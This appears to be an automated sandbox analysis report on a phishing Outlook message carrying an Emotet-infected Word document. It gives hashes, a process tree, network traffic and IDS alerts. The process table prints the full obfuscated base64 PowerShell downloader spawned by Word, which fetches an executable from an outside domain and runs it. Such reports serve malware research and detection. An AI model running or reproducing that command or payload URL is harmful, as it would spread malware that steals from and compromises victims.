File name: | Williams Allison R Payment for eInvoice.msg |
Full analysis: | https://app.any.run/tasks/5e80615d-a019-4899-b1fd-971f6abfa0e9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 14, 2019, 22:22:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | 2C4E32EECA2524903E40B7459D980C91 |
SHA1: | CA61093F9D2B4AE2DE3F6A49BA5DE6363B754684 |
SHA256: | 53496A4CDD7024D86F04067A678EB952B6801D8D8B322C92EEFCAF1840458D70 |
SSDEEP: | 6144:1W0H77HUUUUUUUUUUUUUUUUUUUT52Vjc/7m3bX1SHRUXTBUb2vqrt2w2N8v:E0H77HUUUUUUUUUUUUUUUUUUUTCjcDm6 |
.msg | | | Outlook Message (41.3) |
---|---|---|
.oft | | | Outlook Form Template (24.1) |
.doc | | | Microsoft Word document (18.6) |
.doc | | | Microsoft Word document (old ver.) (11) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3012 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Williams Allison R Payment for eInvoice.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
3580 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\80TVXFJ4\Untitled_03_2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2232 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2864 | powershell -e LgAgACgAIAAkAHMAaABlAGwAbABJAGQAWwAxAF0AKwAkAHMASABlAGwATABJAEQAWwAxADMAXQArACcAWAAnACkAIAAoACAAbgBFAHcALQBvAEIAagBFAGMAVAAgAGkATwAuAFMAVABSAGUAQQBNAHIAZQBBAEQAZQByACgAIAAoAG4ARQB3AC0AbwBCAGoARQBjAFQAIABzAHkAUwB0AGUAbQAuAGkAbwAuAGMATwBNAFAAcgBFAFMAcwBJAE8ATgAuAGQAZQBGAEwAQQBUAEUAUwBUAHIAZQBhAE0AKAAgAFsASQBvAC4AbQBFAG0AbwBSAFkAcwB0AFIAZQBBAE0AXQBbAGMAbwBOAHYAZQBSAFQAXQA6ADoARgByAE8AbQBCAGEAUwBFADYANABTAFQAcgBpAE4ARwAoACAAKAAnAFgAJwArACcAWgBKAGgAJwArACcAYgA5AG8AdwAnACsAJwBFAEkAYgAvAFMAagA1AEUAJwArACcATQBvACcAKwAnAGcAUgAnACsAJwBsAHkAMQAnACsAJwBiAFcAYQBOAEkAdgBaACcAKwAnAEEAdQBRACcAKwAnAG0AJwArACcASwBvADEAcABaADEAcQB5AFoATgBUAGoAaABJAGEAJwArACcAbQBOAG4AagAnACsAJwBpAEUAdABpACcAKwAnAFAAOQBlADAANQBaADIAJwArACcAbQB2ADMATgA5ADkAeAA3AHIAJwArACcAOQA2ACcAKwAnAHoAbgArAFMAJwArACcAUQBsAFIAbgAnACsAJwBFAGgARQBQAHEATAAnACsAJwBnACcAKwAnAEMASgAvAEYAKwA1AGcAQgAnACsAJwBCAGkAaABkADEAUQBGADMAZABZAFcAbQArAE8ATgAnACsAJwByAGoAQgAnACsAJwBZAGkASgByAFYARAAnACsAJwBiACcAKwAnAHkANQBVAGoAJwArACcAQQBSACcAKwAnAE0AUwBrAHMAcgBhADUAbwBOACcAKwAnAFIAcQAnACsAJwBMAFEAdQBVAFYAJwArACcAaQB0ACcAKwAnAFoAJwArACcASwB3AHgAJwArACcASwB2AGEAJwArACcAWgBkACcAKwAnAE0AeQB5ACcAKwAnADEAcwBvADYAbQBtADAAWgBxAHYAJwArACcAbQAnACsAJwBqACcAKwAnAHAAaAAwACcAKwAnADkAagBSAFMAOQBQAEwAVwAnACsAJwBoAE0AYgBiACcAKwAnAFcAcAA5ACcAKwAnAFoAbwAzAHYASwAnACsAJwB4AGUAJwArACcAdQAvAGgAJwArACcAaQBYACcAKwAnAFMAdAAnACsAJwBhACcAKwAnAFgASQBuAFoAJwArACcATQA5AHMAZQA0AGMAMgBXAEsAeQAnACsAJwBlADMAMABCAFkAbABOADYAagAnACsAJwA0AEUANwAwAGIAagBZADAAJwArACcAcABOAGoAUgAnACsAJwBsAC8AJwArACcASQAzAHQAdQBpADYAJwArACcAdwAnACsAJwBGACcAKwAnAFIAJwArACcAWgBjACcAKwAnADEAJwArACcARwAnACsAJwBwAGwAJwArACcARAAnACsAJwBUACcAKwAnADQATAB0ACsAYwBmACcAKwAnADUAVwAnACsAJwBJACcAKwAnAHIANgAnACsAJwBmAHoAbQAvAEgAYgAnACsAJwAzAFoAbQAnACsAJwBLADEAYgBzAHUAbgArAHAAawBOAFIAMgAnACsAJwBOAHAANgBYAHoANgBsACcAKwAnADUATABnAFcAeQBOAHIAMgB5AE8AJwArACcAWABwAEIALwA1AE4AJwArACcAWQBnAFUAbQAnACsAJwBMACcAKwAnADYAUAAnACsAJwB5ACcAKwAnAFgAZQA0AHoAVgBqADQAMAArAFgAegBkAFoAJwArACcAUgBtAGUAJwArACcAYwA2ADgAMgBDAFAAaAAnACsAJwA1ACcAKwAnAC8AZgB1ACcAKwAnAG8AJwArACcAZQAnACsAJwB0AGMAYwBHACcAKwAnAEYAJwArACcATQBaACcAKwAnAGcASQAwACcAKwAnAFQATgBpAFIAbQAnACsAJwBiAEUAJwArACcAUwAnACsAJwBXAEEANABRACcAKwAnACsANgBpADIARgA1AHMAVwBUAFcAUAAwAHMAcAAnACsAJwBZADQASQBMAC8ASgA0AEMAUQB4AEkAQQBIAGUAJwArACcASQA0AG0AVwAyAHEAQgAnACsAJwBMAG8AZQBkAGYAcAAnACsAJwBhACcAKwAnAEgAYgBnAGwAYwByADcAJwArACcAeQAnACsAJwBYAGsALwB0ADYAYQAnACsAJwBoAC8AMwAnACsAJwBMAFMAJwArACcAbwAnACsAJwBKACcAKwAnAFUAJwArACcAZAAnACsAJwArAHEAWQAnACsAJwA1AGgAYwBuAGQASQAnACsAJwBMAGYAZQBhAC8ARABuACcAKwAnAE4AOAA3AEUATgBsAHgAJwArACcATAAnACsAJwBQAGsAQgBmACcAKwAnADUAJwArACcAdwAnACsAJwBwAFMARQBnADAAJwArACcAWAAnACsAJwBYAHEAOQAnACsAJwBYAG8AWgAnACsAJwAyAE8ATABXADQALwBnACcAKwAnAGMATwBKAEwAcQBJAEsAbQArADQAUQBpADgAOABjACcAKwAnADYAZgB2ADcAJwArACcAYQAnACsAJwBkAHEAcQAnACsAJwB3AFgAKwBSADAAJwArACcAYgAnACsAJwArAFQAJwArACcAagBnAHgANQAnACsAJwBsAFMAJwArACcAdgBHAFUAQwBlAHUARQA5AFMATwBNACcAKwAnAE0AaQBPACcAKwAnAGgAJwArACcAeABLAGIAJwArACcAcwB0AHEAZgB6AGoANAAxADUAQwB4AEwATgBHAE8AJwArACcAWQBaAEEASQB5AEUAbgAwACcAKwAnAEMAQQA9AD0AJwApACAAKQAsACAAWwBTAFkAUwBUAGUAbQAuAGkATwAuAGMAbwBtAFAAcgBFAHMAUwBpAE8AbgAuAEMATwBtAHAAcgBlAFMAcwBpAG8AbgBtAG8ARABFAF0AOgA6AGQAZQBjAE8AbQBwAHIAZQBTAFMAIAApACkAIAAsACAAWwBTAHkAUwB0AGUAbQAuAFQARQB4AFQALgBlAE4AYwBvAGQASQBuAGcAXQA6ADoAQQBTAEMASQBpACkAIAApAC4AcgBFAGEAZABUAE8ARQBOAEQAKAApACAA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4076 | "C:\Users\admin\492.exe" | C:\Users\admin\492.exe | — | powershell.exe |
User: admin Company: Qihu 360 Software Co., Ltd. Integrity Level: MEDIUM Description: 360 Internet Security Internet Protection Exit code: 0 Version: 2, 0, 0, 1200 | ||||
3352 | "C:\Users\admin\492.exe" | C:\Users\admin\492.exe | — | 492.exe |
User: admin Company: Qihu 360 Software Co., Ltd. Integrity Level: MEDIUM Description: 360 Internet Security Internet Protection Version: 2, 0, 0, 1200 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3012 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRE294.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3012 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF9BC049BEA6F48D3B.TMP | — | |
MD5:— | SHA256:— | |||
3012 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\80TVXFJ4\Untitled_03_2019 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1FCC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_0548317C-9128-401C-A89C-A54A904FDFFD.0\7C383E46.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_0548317C-9128-401C-A89C-A54A904FDFFD.0\~DF38F87CE82225E6AB.TMP | — | |
MD5:— | SHA256:— | |||
2864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HSTJS4Q9CM8KIL2LIYMC.temp | — | |
MD5:— | SHA256:— | |||
3012 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:D8ED93AEC3C34035780114D156C1F1C0 | SHA256:3B3BD0625268741BF3DE7B0200343DD39A82488A2044EB1F5BBB1DECACBB7CE6 | |||
3012 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\80TVXFJ4\Untitled_03_2019.doc | document | |
MD5:F62D87B44A6CBC4194EF4D6BDBAA6928 | SHA256:43DD1B359499D0E3D9BE1CB0E9FC30A5BC16E5A7C36F91A4093A71E44699BF93 | |||
2232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_0548317C-9128-401C-A89C-A54A904FDFFD.0\mso2A0D.tmp | compressed | |
MD5:C5A1BDB2E15D9D3D1A0A925E7BAA67D0 | SHA256:51CA9499B1A4B6B5BAE4809AF4400E1D1366A954704D214B20A22ECC78888897 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3012 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2864 | powershell.exe | GET | 200 | 35.182.171.82:80 | http://toolbeltonline.com/wp-content/uploads/368n/ | CA | executable | 202 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3012 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2864 | powershell.exe | 35.182.171.82:80 | toolbeltonline.com | Amazon.com, Inc. | CA | suspicious |
— | — | 172.217.21.238:80 | — | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
toolbeltonline.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2864 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2864 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2864 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |